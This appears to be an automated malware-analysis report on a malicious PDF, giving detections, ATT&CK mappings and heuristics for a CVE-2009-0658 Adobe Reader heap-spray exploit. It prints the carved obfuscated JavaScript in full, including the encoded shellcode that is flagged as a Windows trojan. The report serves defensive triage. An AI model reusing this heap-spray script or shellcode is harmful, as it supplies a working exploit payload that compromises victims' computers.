MALICIOUS
466
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
This PDF file contains obfuscated JavaScript that utilizes the unescape function and targets a heap spray exploit (CVE-2009-0658). The embedded JavaScript is designed to execute malicious code, likely to download and run a secondary payload. The presence of obfuscated names and the ML classifier's high confidence further support its malicious nature.
Machine Learning
- Nyx PDF Classifier malicious score 0.9975
Heuristics 9
-
Adobe Reader JBIG2Decode generic heap-spray exploit critical CVE likely CVE_2009_0658_GENERIC_SPRAYPDF combines JBIG2Decode image streams with JavaScript heap-spray or decoder scaffolding. This is likely CVE-2009-0658-family Adobe Reader JBIG2 exploitation, but it lacks the stricter Reader-9 version gate or decoded page-word shellcode fingerprint required by the exact rule.
-
JBIG2 + active content high PDF_JBIG2_ACTIVE_CONTENTJBIG2Decode appears with JavaScript/XFA/RichMedia — a related indicator for JBIG2 parser-exploit families including CVE-2021-30860 and CVE-2009-0658, but not a unique CVE fingerprint.
-
ClamAV: Heuristics.PDF.ObfuscatedNameObject critical CLAMAV_DETECTIONClamAV detected this file as malware: Heuristics.PDF.ObfuscatedNameObject
-
Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECTA PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var hSasWaXPOLmUKHwiwVnIRsceAXSfaxshe = ""; var GV = unescape("%u274e%u4096%u934f%u4042%u402f%u93fc%u9190%u494b%u2743%u4848%u2796%u4192%u4749%u3743%u9890%ufc98%u4198%ufc99%ud648%ud64b%u4b3f%ufd43%uf5d6%u373f%u4b48%uf990%u934a%u374f%u9142%u9190%u9241%u2791%u404b%u4e92%u4a2f%u9343%u4343%u4a40%u409b%u4f99%uf927%u919f%u4093%u9147%u9f3f%u4e40%u4391%ud64f%ufc4f%u3f40%u924f%u9942%u484a%u37fd%u9799%u4399%u2f37%u48d6%uf8f5%uf8f8%ufd40%u93fd%u90fc%u3f48%u99fd%u96fd%u474e%u27fc%u9896%uf897%ufd46%u9998%u402f%u43f8%u4f92%uf9f8%u4099%u464e%u9b90%uf … var iakNtRzpxVSefRnXlnzoeLyMtGUqlu = ""; -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
JBIG2Decode filter medium PDF_JBIG2JBIG2 image decoder present — historically used in zero-click exploits
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0006_000.js |
pdf-javascript-stream | PDF /JS object 6 at offset 0x249 | 5560 bytes |
SHA-256: 83386dfb937b476b378e79833f8e9ae6e937543e856247fffc4ec6540428581b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). 11 of 16 identifiers look randomly generated (e.g. 'FKpFSCwKyyWfPRJFKuTqtlsfuKOwqucDafYNzxBG') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var CqCG = "";
var hSasWaXPOLmUKHwiwVnIRsceAXSfaxshe = "";
var GV = unescape("%u274e%u4096%u934f%u4042%u402f%u93fc%u9190%u494b%u2743%u4848%u2796%u4192%u4749%u3743%u9890%ufc98%u4198%ufc99%ud648%ud64b%u4b3f%ufd43%uf5d6%u373f%u4b48%uf990%u934a%u374f%u9142%u9190%u9241%u2791%u404b%u4e92%u4a2f%u9343%u4343%u4a40%u409b%u4f99%uf927%u919f%u4093%u9147%u9f3f%u4e40%u4391%ud64f%ufc4f%u3f40%u924f%u9942%u484a%u37fd%u9799%u4399%u2f37%u48d6%uf8f5%uf8f8%ufd40%u93fd%u90fc%u3f48%u99fd%u96fd%u474e%u27fc%u9896%uf897%ufd46%u9998%u402f%u43f8%u4f92%uf9f8%u4099%u464e%u9b90%uf9f8%ud641%u40f5%u9293%u9247%uf596%u9397%u9f4a%u9797%uf599%u99f9%u2f9b%u3f2f%u37fd%u3747%u4efc%ufc9f%u4a4f%u9199%u9f4f%u91d6%u9927%u4e42%u3727%u4e47%u492f%u40fd%u462f%u9b90%ufc97%u423f%u4efd%u96d6%u3f43%uf541%u4993%u3797%u9b4f%u42f5%u919b%u4740%u4997%uf591%u4e40%u3792%u4746%u4796%u4097%ufd2f%u4342%u9b4b%u494a%u4840%u2f41%ufdd6%u4890%u4897%ud648%ufd40%u9696%u4699%u9f41%u4940%u9791%u9992%u432f%u912f%u4337%ufd98%u3746%ufcf8%u4798%u4990%u99fc%ufd92%u4f9b%u42fc%u9791%uf83f%u4f97%u4897%ufd96%ufcf8%u3f42%u2790%u40f5%u9090%uf849%u4af8%u924f%u933f%u9749%u2790%u404f%u434a%u4396%u9091%uf84b%u4f47%u9243%u40f5%uf527%u4bf9%u3ff5%u9b37%u4a4f%u4b99%u9696%u9048%u409f%u4849%u9241%u9242%u3f4e%ufcfc%u4742%uf599%u4f96%uf92f%u919f%u3f9f%u27d6%u4bfc%uf93f%ufc4e%u979b%u4648%u9b48%u3f42%u2f96%u2f9b%u48f9%u969f%u414a%u4840%u4292%u4937%uf5f5%u919f%u9243%u4393%uf9fc%u4846%u9748%u9b43%u9846%u994b%uf84e%u9690%u49fc%u979f%ufcfd%u49f9%u2ffd%ufd91%u4192%u97d6%u9242%ufd90%u4740%u3796%uf848%u4f43%u2f98%u4349%u2747%u9092%u9ff8%u9248%u9743%uf54b%u43f9%u9296%u4bfd%u9298%u4647%u9291%u9697%u9243%u9146%u9b97%uf8f8%u90f5%u4b46%u9127%u9843%u9243%u379b%u4a92%u279f%u9196%u2798%u9247%uf8d6%u274f%uf946%u4b9f%u4637%u2f96%u2747%u9296%u4a46%u4041%u4e37%u4793%uf940%u4046%u93d6%u9242%u9648%uf5fd%u4a9f%ufc47%u4196%ufc41%u98d6%uf54e%u27f5%u4a99%u9993%u9246%u979f%u3727%uf937%uf899%u434a%u47f8%u494f%u4298%ufc93%ud642%u4f93%u4793%u4892%u4e92%ufc92%u483f%u9749%u3790%u2f99%u2ffd%uf84f%u4a4e%u4346%uf94e%u9342%ufd27%uf84e%uf596%u37f5%u9148%u4799%u3f97%u27f8%u4a40%u4893%u4996%u9943%u4643%ufd37%u992f%u98f9%u91fd%u9237%u4a9b%u4f4f%ufc40%u82e8%u0000%u6000%ue589%uc031%u8b64%u3050%u528b%u8b0c%u1452%u728b%u0f28%u4ab7%u3126%uacff%u613c%u027c%u202c%ucfc1%u010d%ue2c7%u52f2%u8b57%u1052%u4a8b%u8b3c%u114c%ue378%u0148%u51d1%u598b%u0120%u8bd3%u1849%u3ae3%u8b49%u8b34%ud601%uff31%uc1ac%u0dcf%uc701%ue038%uf675%u7d03%u3bf8%u247d%ue475%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f5f%u8b5a%ueb12%u5d8d%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u056a%uc068%u32a8%u68d6%u0002%u0004%ue689%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u97d5%u106a%u5756%u9968%u74a5%uff61%u85d5%u74c0%uff0a%u084e%uec75%u61e8%u0000%u6a00%u6a00%u5604%u6857%ud902%u5fc8%ud5ff%uf883%u7e00%u8b36%u6a36%u6840%u1000%u0000%u6a56%u6800%ua458%ue553%ud5ff%u5393%u006a%u5356%u6857%ud902%u5fc8%ud5ff%uf883%u7d00%u5822%u0068%u0040%u6a00%u5000%u0b68%u0f2f%uff30%u57d5%u7568%u4d6e%uff61%u5ed5%uff5e%u240c%u71e9%uffff%u01ff%u29c3%u75c6%uc3c7%uf0bb%ua2b5%u6a56%u5300%ud5ff");
var iakNtRzpxVSefRnXlnzoeLyMtGUqlu = "";
for (nvsDOVevVqKsfbAsyftUercUbBNShUBusosLQZy=128;nvsDOVevVqKsfbAsyftUercUbBNShUBusosLQZy>=0;--nvsDOVevVqKsfbAsyftUercUbBNShUBusosLQZy) iakNtRzpxVSefRnXlnzoeLyMtGUqlu += unescape("%u9196%u4642");
gqmTFlT = iakNtRzpxVSefRnXlnzoeLyMtGUqlu + GV;
rmmxzLtoaNAfGItxtsL = unescape("%u9196%u4642");
OJsUI = 20;
mzxLLBkBUHPCceEvb = OJsUI+gqmTFlT.length
while (rmmxzLtoaNAfGItxtsL.length<mzxLLBkBUHPCceEvb) rmmxzLtoaNAfGItxtsL+=rmmxzLtoaNAfGItxtsL;
FKpFSCwKyyWfPRJFKuTqtlsfuKOwqucDafYNzxBG = rmmxzLtoaNAfGItxtsL.substring(0, mzxLLBkBUHPCceEvb);
jIVLyKehFHdJNyPxyuMZYBfDgtUikYqkE = rmmxzLtoaNAfGItxtsL.substring(0, rmmxzLtoaNAfGItxtsL.length-mzxLLBkBUHPCceEvb);
while(jIVLyKehFHdJNyPxyuMZYBfDgtUikYqkE.length+mzxLLBkBUHPCceEvb < 0x40000) jIVLyKehFHdJNyPxyuMZYBfDgtUikYqkE = jIVLyKehFHdJNyPxyuMZYBfDgtUikYqkE+jIVLyKehFHdJNyPxyuMZYBfDgtUikYqkE+FKpFSCwKyyWfPRJFKuTqtlsfuKOwqucDafYNzxBG;
auVbpxpqyqKJjlSIoIbmXFRMVvKDRJJI = new Array();
for (nvsDOVevVqKsfbAsyftUercUbBNShUBusosLQZy=0;nvsDOVevVqKsfbAsyftUercUbBNShUBusosLQZy<100;nvsDOVevVqKsfbAsyftUercUbBNShUBusosLQZy++) auVbpxpqyqKJjlSIoIbmXFRMVvKDRJJI[nvsDOVevVqKsfbAsyftUercUbBNShUBusosLQZy] = jIVLyKehFHdJNyPxyuMZYBfDgtUikYqkE + gqmTFlT;
for (nvsDOVevVqKsfbAsyftUercUbBNShUBusosLQZy=142;nvsDOVevVqKsfbAsyftUercUbBNShUBusosLQZy>=0;--nvsDOVevVqKsfbAsyftUercUbBNShUBusosLQZy) hSasWaXPOLmUKHwiwVnIRsceAXSfaxshe += unescape("%ub550%u0166");
ecuuIRLdFh = hSasWaXPOLmUKHwiwVnIRsceAXSfaxshe.length + 20
while (hSasWaXPOLmUKHwiwVnIRsceAXSfaxshe.length < ecuuIRLdFh) hSasWaXPOLmUKHwiwVnIRsceAXSfaxshe += hSasWaXPOLmUKHwiwVnIRsceAXSfaxshe;
MMZjJbmlWfyHhm = hSasWaXPOLmUKHwiwVnIRsceAXSfaxshe.substring(0, ecuuIRLdFh);
IveiahZOTXXCGScmsVqgUaxTtTDyPUIdSgyAQw = hSasWaXPOLmUKHwiwVnIRsceAXSfaxshe.substring(0, hSasWaXPOLmUKHwiwVnIRsceAXSfaxshe.length-ecuuIRLdFh);
while(IveiahZOTXXCGScmsVqgUaxTtTDyPUIdSgyAQw.length+ecuuIRLdFh < 0x40000) IveiahZOTXXCGScmsVqgUaxTtTDyPUIdSgyAQw = IveiahZOTXXCGScmsVqgUaxTtTDyPUIdSgyAQw+IveiahZOTXXCGScmsVqgUaxTtTDyPUIdSgyAQw+MMZjJbmlWfyHhm;
sCa = new Array();
for (nvsDOVevVqKsfbAsyftUercUbBNShUBusosLQZy=0;nvsDOVevVqKsfbAsyftUercUbBNShUBusosLQZy<175;nvsDOVevVqKsfbAsyftUercUbBNShUBusosLQZy++) sCa[nvsDOVevVqKsfbAsyftUercUbBNShUBusosLQZy] = IveiahZOTXXCGScmsVqgUaxTtTDyPUIdSgyAQw + hSasWaXPOLmUKHwiwVnIRsceAXSfaxshe;
|
|||
javascript_obj0006_000_shellcode_00.bin |
pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 6 at offset 0x249 | 1024 bytes |
SHA-256: b2a24285f00ef557a0aef9ab64d8ebf32e88a0c79a94dfb385b9be64cc3c4c69 |
|||
|
Detection
ClamAV:
Win.Trojan.MSShellcode-7
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.